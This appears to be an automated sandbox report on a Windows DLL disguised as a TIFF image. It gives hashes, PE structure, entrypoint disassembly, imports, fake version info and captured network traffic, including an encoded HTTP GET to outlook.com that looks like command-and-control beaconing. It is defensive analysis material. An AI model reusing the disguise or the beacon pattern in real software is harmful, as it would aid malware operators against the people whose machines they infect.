Entropy (8bit):	0.4106988703667074
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo19loV9lWGOyqyN4:kBqoI+glt9
MD5:	B7796152E2D67FE2A933DE459C627111
SHA1:	ADDA7FFAC9F85AAF9ADD7FFED33C359333CF2017
SHA-256:	8FE8BAB0CBA61FF6244059D467FE8A550F96650FA9B247DA1C5C99F64C68AC2E
SHA-512:	CB66D870F71B7BCB93B74276733079062BCDD216183D64C5624235C797887BFEA7DCAAB002A0ED2B644C118636B7B45C279B0CB7F0ADA8338DC2FE724DCD67AE
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.388590209681191
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	609a460e94791.tiff.dll
File size:	841216
MD5:	50a299d1e92d9205e123404c8e05904d
SHA1:	c188272ab757dbbf14e74781fc90fcefe4aeb615
SHA256:	3b56b7298c366a323d28658a455abf0d4e78fa197a43ce13bedab05f26901d34
SHA512:	ec30f36d70ddbb6ba4aaccb3342e0a0ffbd586d2784370500a94e33aa650d1c56d3712ffc3a9e15a0558194ce26d1b76d9f2a8953220684bef634e57f4579df1
SSDEEP:	12288:mzCoYRvNZrA8Res/TPUOjUUGcqcoWEx9kMGUS6vOV5y4gnuD5wtqqB7ol:VdNZr5RLL1AZ/clUnHvk5hgU
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..`...........!.................0....................................................@..........................{..x..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1033080
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6092C34C [Wed May 5 16:09:48 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	dc55991f7b8a912c780d10d352635290

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FC658BC9A27h
call 00007FC658BCA6F7h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007FC658BC9806h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-04h], ecx
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [eax]
mov dword ptr [ebp-04h], ecx
mov eax, dword ptr [ebp-04h]
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push eax
call 00007FC658BC99F9h
add esp, 04h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push eax
call 00007FC658BC9A99h
add esp, 04h
test eax, eax
je 00007FC658BC9A23h
int3
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push eax
call 00007FC658BC9A79h
add esp, 04h
test eax, eax
je 00007FC658BC9A29h
mov ecx, 00000041h
int 29h
pop ebp
ret
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+08h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc7bb0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc7c28	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe8000	0x3a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe9000	0x51e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc5ecc	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xc5f20	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9b000	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x997af	0x99800	False	0.488934942488	data	6.50079371898	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9b000	0x2d5aa	0x2d600	False	0.326892863292	data	4.74980452387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc9000	0x1efdc	0xe00	False	0.209821428571	data	3.01039741419	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe8000	0x3a0	0x400	False	0.404296875	data	3.03375733203	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe9000	0x51e0	0x5200	False	0.770293445122	data	6.74990882481	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xe8060	0x340	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileW, GetWindowsDirectoryW, ReadFile, GetConsoleMode, OpenMutexW, CloseHandle, GetFileSize, DeleteCriticalSection, ReadConsoleW, VirtualProtectEx, GetConsoleCP, FlushFileBuffers, SetFilePointerEx, GetFileSizeEx, SetStdHandle, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, EncodePointer, FreeLibrary, LoadLibraryExW, GetModuleFileNameW, GetModuleHandleExW, ExitProcess, HeapAlloc, HeapValidate, GetSystemInfo, GetCurrentThread, GetStdHandle, GetFileType, WriteFile, OutputDebugStringW, WriteConsoleW, SetConsoleCtrlHandler, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, DecodePointer
UxTheme.dll	CloseThemeData
AVIFIL32.dll	AVIFileGetStream, AVIFileOpenW, AVIFileExit, AVIFileInit, AVIFileEndRecord
TAPI32.dll	lineRedirectW, lineInitialize, lineHold, lineShutdown, lineTranslateAddressW

Exports

Name	Ordinal	Address
Hundredpopulate@@8	1	0x1030208
Mark@@12	2	0x10303fe
Seefit@@8	3	0x103046c

Version Infos

Description	Data
LegalCopyright	Dad plan Corporation. All rights reserved
InternalName	Team Lonesell
FileVersion	7.2.6.201
CompanyName	Dad plan Corporation
These	95
ProductName	Dad plan Fair fell
ProductVersion	7.2.6.201
FileDescription	Dad plan Fair fell
OriginalFilename	fall.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 11, 2021 11:12:44.427018881 CEST	49732	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.427045107 CEST	49733	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.607211113 CEST	80	49732	40.97.161.50	192.168.2.6
May 11, 2021 11:12:44.607337952 CEST	49732	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.608804941 CEST	49732	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.612221003 CEST	80	49733	40.97.161.50	192.168.2.6
May 11, 2021 11:12:44.612348080 CEST	49733	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.792617083 CEST	80	49732	40.97.161.50	192.168.2.6
May 11, 2021 11:12:44.792712927 CEST	49732	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.792838097 CEST	49732	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.806026936 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.971962929 CEST	80	49732	40.97.161.50	192.168.2.6
May 11, 2021 11:12:44.987812042 CEST	443	49734	40.97.161.50	192.168.2.6
May 11, 2021 11:12:44.987920046 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:44.997282028 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:45.180705070 CEST	443	49734	40.97.161.50	192.168.2.6
May 11, 2021 11:12:45.180744886 CEST	443	49734	40.97.161.50	192.168.2.6
May 11, 2021 11:12:45.180768013 CEST	443	49734	40.97.161.50	192.168.2.6
May 11, 2021 11:12:45.180855989 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:45.276611090 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:45.285624981 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:45.459654093 CEST	443	49734	40.97.161.50	192.168.2.6
May 11, 2021 11:12:45.460292101 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:45.470313072 CEST	443	49734	40.97.161.50	192.168.2.6
May 11, 2021 11:12:45.472281933 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:45.576265097 CEST	49734	443	192.168.2.6	40.97.161.50
May 11, 2021 11:12:45.659774065 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.661045074 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.708501101 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.709875107 CEST	443	49736	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.710011959 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.710911989 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.710912943 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.711765051 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.757880926 CEST	443	49734	40.97.161.50	192.168.2.6
May 11, 2021 11:12:45.760519028 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.760541916 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.760556936 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.760607958 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.760670900 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.761409998 CEST	443	49736	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.761429071 CEST	443	49736	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.761445045 CEST	443	49736	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.761499882 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.761563063 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.774986029 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.776258945 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.784162045 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.826571941 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.827660084 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.827770948 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.835220098 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.835249901 CEST	443	49736	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.835447073 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.835484028 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.835897923 CEST	49735	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:45.886379957 CEST	443	49735	52.97.201.34	192.168.2.6
May 11, 2021 11:12:45.918647051 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:45.922597885 CEST	49738	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:45.965564966 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:45.965801001 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:45.966717958 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:45.974643946 CEST	443	49738	40.101.12.82	192.168.2.6
May 11, 2021 11:12:45.974823952 CEST	49738	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:45.975717068 CEST	49738	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.017079115 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.017102003 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.017115116 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.017225027 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.031157017 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.031497955 CEST	443	49738	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.031522036 CEST	443	49738	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.031536102 CEST	443	49738	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.031650066 CEST	49738	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.031689882 CEST	49738	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.032501936 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.039944887 CEST	49738	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.079329014 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.079353094 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.079552889 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.085823059 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.085839987 CEST	443	49737	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.085958958 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:46.094058990 CEST	443	49738	40.101.12.82	192.168.2.6
May 11, 2021 11:12:46.094203949 CEST	49738	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:48.734452009 CEST	49737	443	192.168.2.6	40.101.12.82
May 11, 2021 11:12:48.734502077 CEST	49733	80	192.168.2.6	40.97.161.50
May 11, 2021 11:12:48.734641075 CEST	49736	443	192.168.2.6	52.97.201.34
May 11, 2021 11:12:48.734688997 CEST	49738	443	192.168.2.6	40.101.12.82

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 11, 2021 11:10:04.627749920 CEST	62044	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:04.688019037 CEST	53	62044	8.8.8.8	192.168.2.6
May 11, 2021 11:10:05.065530062 CEST	63791	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:05.119048119 CEST	53	63791	8.8.8.8	192.168.2.6
May 11, 2021 11:10:05.514097929 CEST	64267	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:05.565658092 CEST	53	64267	8.8.8.8	192.168.2.6
May 11, 2021 11:10:06.473062992 CEST	49448	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:06.521815062 CEST	53	49448	8.8.8.8	192.168.2.6
May 11, 2021 11:10:07.315968037 CEST	60342	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:07.366607904 CEST	53	60342	8.8.8.8	192.168.2.6
May 11, 2021 11:10:08.172081947 CEST	61346	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:08.222429991 CEST	53	61346	8.8.8.8	192.168.2.6
May 11, 2021 11:10:09.185693026 CEST	51774	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:09.235651016 CEST	53	51774	8.8.8.8	192.168.2.6
May 11, 2021 11:10:12.379355907 CEST	56023	53	192.168.2.6	8.8.8.8
May 11, 2021 11:10:12.445902109 CEST	53	56023	8.8.8.8	192.168.2.6
May 11, 2021 11:11:01.546735048 CEST	58384	53	192.168.2.6	8.8.8.8
May 11, 2021 11:11:01.606127977 CEST	53	58384	8.8.8.8	192.168.2.6
May 11, 2021 11:11:56.163331985 CEST	60261	53	192.168.2.6	8.8.8.8
May 11, 2021 11:11:56.240215063 CEST	53	60261	8.8.8.8	192.168.2.6
May 11, 2021 11:12:09.364795923 CEST	56061	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:09.416450024 CEST	53	56061	8.8.8.8	192.168.2.6
May 11, 2021 11:12:13.470910072 CEST	58336	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:13.550908089 CEST	53	58336	8.8.8.8	192.168.2.6
May 11, 2021 11:12:14.031019926 CEST	53781	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:14.105607033 CEST	53	53781	8.8.8.8	192.168.2.6
May 11, 2021 11:12:14.831053019 CEST	54064	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:14.882730961 CEST	53	54064	8.8.8.8	192.168.2.6
May 11, 2021 11:12:16.026129007 CEST	52811	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:16.076328039 CEST	53	52811	8.8.8.8	192.168.2.6
May 11, 2021 11:12:16.941219091 CEST	55299	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:17.005312920 CEST	53	55299	8.8.8.8	192.168.2.6
May 11, 2021 11:12:17.129851103 CEST	63745	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:17.178631067 CEST	53	63745	8.8.8.8	192.168.2.6
May 11, 2021 11:12:18.321643114 CEST	50055	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:18.373451948 CEST	53	50055	8.8.8.8	192.168.2.6
May 11, 2021 11:12:19.467077017 CEST	61374	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:19.518699884 CEST	53	61374	8.8.8.8	192.168.2.6
May 11, 2021 11:12:21.247014046 CEST	50339	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:21.301250935 CEST	53	50339	8.8.8.8	192.168.2.6
May 11, 2021 11:12:24.820668936 CEST	63307	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:24.873788118 CEST	53	63307	8.8.8.8	192.168.2.6
May 11, 2021 11:12:25.939068079 CEST	49694	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:25.987807989 CEST	53	49694	8.8.8.8	192.168.2.6
May 11, 2021 11:12:27.270266056 CEST	54982	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:27.319264889 CEST	53	54982	8.8.8.8	192.168.2.6
May 11, 2021 11:12:42.907170057 CEST	50010	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:42.967122078 CEST	53	50010	8.8.8.8	192.168.2.6
May 11, 2021 11:12:44.360722065 CEST	63718	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:44.412343025 CEST	53	63718	8.8.8.8	192.168.2.6
May 11, 2021 11:12:45.587485075 CEST	62116	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:45.647985935 CEST	53	62116	8.8.8.8	192.168.2.6
May 11, 2021 11:12:45.865833044 CEST	63816	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:45.916495085 CEST	53	63816	8.8.8.8	192.168.2.6
May 11, 2021 11:12:50.559823990 CEST	55014	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:50.628758907 CEST	53	55014	8.8.8.8	192.168.2.6
May 11, 2021 11:12:53.348803043 CEST	62208	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:53.413844109 CEST	53	62208	8.8.8.8	192.168.2.6
May 11, 2021 11:12:58.119138956 CEST	57574	53	192.168.2.6	8.8.8.8
May 11, 2021 11:12:58.181350946 CEST	53	57574	8.8.8.8	192.168.2.6
May 11, 2021 11:13:12.908103943 CEST	51818	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:12.966835022 CEST	53	51818	8.8.8.8	192.168.2.6
May 11, 2021 11:13:13.940148115 CEST	51818	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:13.998016119 CEST	53	51818	8.8.8.8	192.168.2.6
May 11, 2021 11:13:14.508028984 CEST	56628	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:14.608186960 CEST	53	56628	8.8.8.8	192.168.2.6
May 11, 2021 11:13:14.986512899 CEST	51818	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:15.043967009 CEST	53	51818	8.8.8.8	192.168.2.6
May 11, 2021 11:13:15.190351009 CEST	60778	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:15.330728054 CEST	53	60778	8.8.8.8	192.168.2.6
May 11, 2021 11:13:15.921439886 CEST	53799	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:16.058612108 CEST	53	53799	8.8.8.8	192.168.2.6
May 11, 2021 11:13:17.004277945 CEST	51818	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:17.061121941 CEST	53	51818	8.8.8.8	192.168.2.6
May 11, 2021 11:13:21.021867037 CEST	51818	53	192.168.2.6	8.8.8.8
May 11, 2021 11:13:21.079363108 CEST	53	51818	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 11, 2021 11:12:44.360722065 CEST	192.168.2.6	8.8.8.8	0x5036	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.587485075 CEST	192.168.2.6	8.8.8.8	0xd3a9	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.865833044 CEST	192.168.2.6	8.8.8.8	0x6381	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 11, 2021 11:12:13.550908089 CEST	8.8.8.8	192.168.2.6	0x1017	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
May 11, 2021 11:12:44.412343025 CEST	8.8.8.8	192.168.2.6	0x5036	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	HHN-efz.ms-acdc.office.com		52.97.201.34	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.50	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	HHN-efz.ms-acdc.office.com		40.101.136.2	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.647985935 CEST	8.8.8.8	192.168.2.6	0xd3a9	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.66	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.916495085 CEST	8.8.8.8	192.168.2.6	0x6381	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:45.916495085 CEST	8.8.8.8	192.168.2.6	0x6381	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:45.916495085 CEST	8.8.8.8	192.168.2.6	0x6381	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 11:12:45.916495085 CEST	8.8.8.8	192.168.2.6	0x6381	No error (0)	FRA-efz.ms-acdc.office.com		40.101.12.82	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.916495085 CEST	8.8.8.8	192.168.2.6	0x6381	No error (0)	FRA-efz.ms-acdc.office.com		52.97.179.194	A (IP address)	IN (0x0001)
May 11, 2021 11:12:45.916495085 CEST	8.8.8.8	192.168.2.6	0x6381	No error (0)	FRA-efz.ms-acdc.office.com		52.97.189.98	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

outlook.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49732	40.97.161.50	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 11, 2021 11:12:44.608804941 CEST	1261	OUT	GET /login/greed/gx9NI4Ybpp/8F85m84ndjn4UwJSZ/KFY_2BxmUPMy/coa0QUktAbb/vjBaicl7yvyNDs/NaAVAq9mPnbNTlKz1AUy2/5aIKWQiZNRBNaijS/Tt5Vo5dnaNIMeJI/Piqfb55cpfCEI8CpHK/_2FWICMIW/YUkQnOfGVld1SPd1rTnm/w0s_2F9NNcplFjkZ_2F/ufX9zF863VCJiOMFbmL1SV/K4t8NhPa8Lg/cl7PdmL.gfk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: outlook.com Connection: Keep-Alive
